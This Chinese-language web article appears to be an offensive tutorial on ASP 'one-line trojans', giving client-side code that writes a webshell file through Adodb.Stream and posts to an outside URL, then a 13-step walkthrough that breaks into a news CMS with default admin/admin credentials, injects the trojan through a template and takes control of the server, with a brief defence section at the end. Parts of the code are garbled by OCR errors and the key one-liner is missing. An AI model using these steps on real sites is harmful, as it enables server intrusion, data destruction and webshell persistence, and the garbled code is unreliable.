有很多人对如何使用一句话木马(下面简称“木马”)感到好奇,其实一句话木马并不复杂。首先,需要知道一句话木马分为服务端和客户端。

  所谓“服务端”,就是黑客用来插人到asP文件中的语句(不仅仅是以为后缀的数据库文件),该语句将会作为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为:,其中value可以自己修改。可以看得出来,这样的木马服务端可以说非常安全,因为系统下载的杀毒软件不会把这一条语句当成病毒或黑客工具什么的,因此捡测起来很难。

  所谓“客户端”是指一个网页文件,它用来向服务端提交控制数搪,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件,本例使用的客户端网页文件运行的效果如图所示。

  本例使用的客户端源代码如下(//及右侧内容为说明内容):

  〈formaction=http://bbs.duze.net/mm.aspmethorl=post>

  //action=后面的网址是含有一句话木马服务端的网页文件

  setlP=server.createObject("Adodb.Stream")

  //必须建立对象,才可以使用它固有的属性和方法,理解这一点需要有ASP编程知识。

  lP.Open//打开。

  lP.Type=2//以文本方式。

  lP.CharSet="gb2312"//宇体标准。

  1P.writetextrequest(''xhx")//取得木马内容,参数xhx可以自己定义。

  IP.SaveToFileserver.mappath(丨’wei.asp"),2

  //将木马内容以覆盖的方式写人wd.asp文件。

  IP.Close//关闭对象。

  setIP=nothing//释放对象。

  response.redirect“wei.asp”

  //处理完成后跳转到生成的木马登录页面wei.asp。

  添人生成木马的内容

  这个客户端文件的功能是,利用插入到数搪库文件的这段代码执行第一个中的内容,创建wei.asp这个网页文件,并将第二个文本框中添加的木马内容写人wei.asp,这样就相当于在服务器上建立了asp木马文件,这样就可以取得服务器的Webshdi了。

  除了木马的服务端和客户端网页文件外,还需要准备一个ASP木马文件。这两个文件可以至“http://winxppro.ysl68.com”下载。

  一句话木马可以在很多网站中加以利用,以利用“贫龙”系统为例,需要依次执行如下操作。

  步骤1:在win7中运行IE浏览器并打开谷歌或百度捜索引擎网站页面,输入关键字“贫龙”并按下回车键,随即将看到相当多的搜索结果。

  步骤2:从捜索结果中选择一个提供此系统下载的链接,从中下载此系统并上传到服务器的网站目录中(假设当前网站的ip地址为http://192.168.0.65)。接着,直接访问网站根目录下的Login.asp这个网址,出现登录页面。

  步骤3:先使用默认管理员用户名和密码(均为admin)登录,在如图所示的页面中单击上方的“新闻模板管理”。

  步骤4:在切换到新页面时,单击“修改”链接。

  步骤5:在切换到的页面中,将“”这句代码输入到最下方。

  步骤6:单击“修改”按钮返回上一步后,单击“增加新闻文章”链接进入页面。随便输入一些文章标题和内容文字后,单击下方的“添加”按钮完成此文章的添加。这里需要注意的地方有两点,一是文章的分类是“公司荣誉”,这个分类告诉了我们在哪儿找新增的文章二是新闻使用的模板是“默认模板”,这表示已经把前面添加的木马服务端添加到这篇文章中了。

  步骤7:在出现页面时、把文件名(即2009215160014.asp)复制下来,这表示含有木马的文件名是什么。

  步骤8:打开一个旧浏览器窗口并访问http://192.168.0.65的前面页面找到刚添加的文章。单击文章名称并在打开的页面中把文章访问URL地址复制下来,即“http://192.168.0.65/gsry/2009215160014.asp”。

  步骤9:使用记事本程序打开木马的客户端文件,将“

”这一句中的网址,使用上一步复制的网址替换棹并保存文件。

  步骤10:再使用“记事本”程序打开ASP木马网页文件,将其中的内容复制下来。这里要注意此木马的登录密码为数字1,这个密码将会在下面的应用输入。

  步骤11:使用旧浏览器运行客户端文件,并将复制的木马内容粘贴到下方的文本框中。

  步骤12:单击“提交”按钮后,在被入侵网站中将生成wei.asp这个文件,其内容就是上一步复制的ASP木马文件内容。因此,在自动运行此文件后,将会出现ASP木马的控制页面。

  步骤13:在“密码”栏输入ASP木马指定的密码并单击“登录”按钮.随即就可以看到服务器的内容了。

  此时,黑客就可以使用此ASP木马对服务器进行管理了,比方说对“C:Inetpubwwwroot”目录进行一些破坏操作,等等。

  除了上述实例讲解的人侵方法外,一句话木马也可以人侵并控制存在数据庠过滤不严漏洞的网站,成功的前提是一定要知道网站的数据庠地址(以ASP为后缀,通常显示为乱码),简单插人服务端就可以了。对于一些使用了未知网页程序的网站,通常都是使用结合暴庠或跨站的方法找到它的数据库网站。

  要防范一句话木马,可以从两个方面进行:一是隐藏网站的数据庠,不要让攻击者知道数据庠文件的链接地址,这就需要管理员在网页程序中査找被暴串漏洞,在数搪庠连接文件中加入容错代码等。二是要防止用户提交的数据未过滤漏洞,通过对用户提交的数据过滤,替換一些危险的代码等,比方说,用户插人的“<、>”等字符自动被网页程序转換为其它宇符,这样将让服务端代码无法正常执行。

 
目前共有0条评论
  • 暂无Trackback
你目前的身份是游客,评论请输入昵称和电邮!